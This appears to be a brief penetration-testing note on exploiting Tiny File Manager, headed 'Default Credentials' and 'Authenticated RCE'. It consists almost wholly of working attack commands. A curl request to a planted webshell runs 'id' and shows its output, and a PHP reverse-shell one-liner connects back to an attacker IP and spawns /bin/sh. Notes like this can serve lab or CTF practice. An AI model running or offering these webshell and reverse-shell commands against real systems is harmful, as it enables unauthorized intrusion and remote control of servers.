Tiny File Manager
Default Credentials
Authenticated RCE
Last updated
Last updated
# RCE
$ curl -s --path-as-is "http://spx/webshell.php?cmd=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# Revshell
$ curl -s --path-as-is "http://spx/webshell.php?cmd=php+-r+'\$sock%3dfsockopen(\"192.168.45.170\",80)%3bexec(\"/bin/sh+-i+<%263+>%263+2>%263\")%3b'"